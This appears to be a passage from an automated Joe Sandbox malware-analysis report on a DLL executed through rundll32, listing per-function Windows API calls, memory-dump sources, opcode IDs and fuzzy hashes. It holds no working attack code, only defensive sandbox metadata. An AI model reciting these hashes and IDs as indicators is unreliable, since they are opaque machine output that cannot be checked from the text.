                                                                                                                                    • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                                                    • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                    • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                                    • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                    • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                                    • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                    • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                    • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                                    • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                    • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2459298410-0
                                                                                                                                    • Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                                    • Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
                                                                                                                                    • Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                                    • Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 365290523-0
                                                                                                                                    • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                                    • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                                    • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                                    • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Rect$DesktopVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1055025324-0
                                                                                                                                    • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                                    • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                                    • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                                    • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 1002C6E7
                                                                                                                                      • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                    • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 26245289-0
                                                                                                                                    • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                                    • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                                    • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                                    • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                                    • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                                    • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                                    • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                    • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                                    • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                                    • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                                    • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • GetDC.USER32(?), ref: 1002658E
                                                                                                                                    • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                                    • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3511876931-0
                                                                                                                                    • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                                    • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                                    • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                                    • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __msize_malloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1288803200-0
                                                                                                                                    • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                                    • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                                    • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                                    • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                                    • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                                    • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePeek$H_prolog3
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3998274959-0
                                                                                                                                    • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                                    • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                                    • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                                    • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                                      • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                                      • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                                    • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1532457625-0
                                                                                                                                    • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                                    • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                                    • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                                    • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                                      • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                                    • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                                    • _strtol.LIBCMT ref: 10022CB5
                                                                                                                                    • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                                      • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4211061542-0
                                                                                                                                    • Opcode ID: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                                    • Instruction ID: 5151050668a075cb653ef24e642dff21439099837a3a94c33d4a4bfb9d6c905b
                                                                                                                                    • Opcode Fuzzy Hash: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                                    • Instruction Fuzzy Hash: 352127755002556FDB21DFB49C81BAEB7F8DF48241FA14066F984D7240DB709D40CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArrayDestroyFreeSafeTask
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3253174383-0
                                                                                                                                    • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                                    • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                                    • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                                    • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2161412305-0
                                                                                                                                    • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                                    • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                                    • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                                    • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                                      • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                    • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
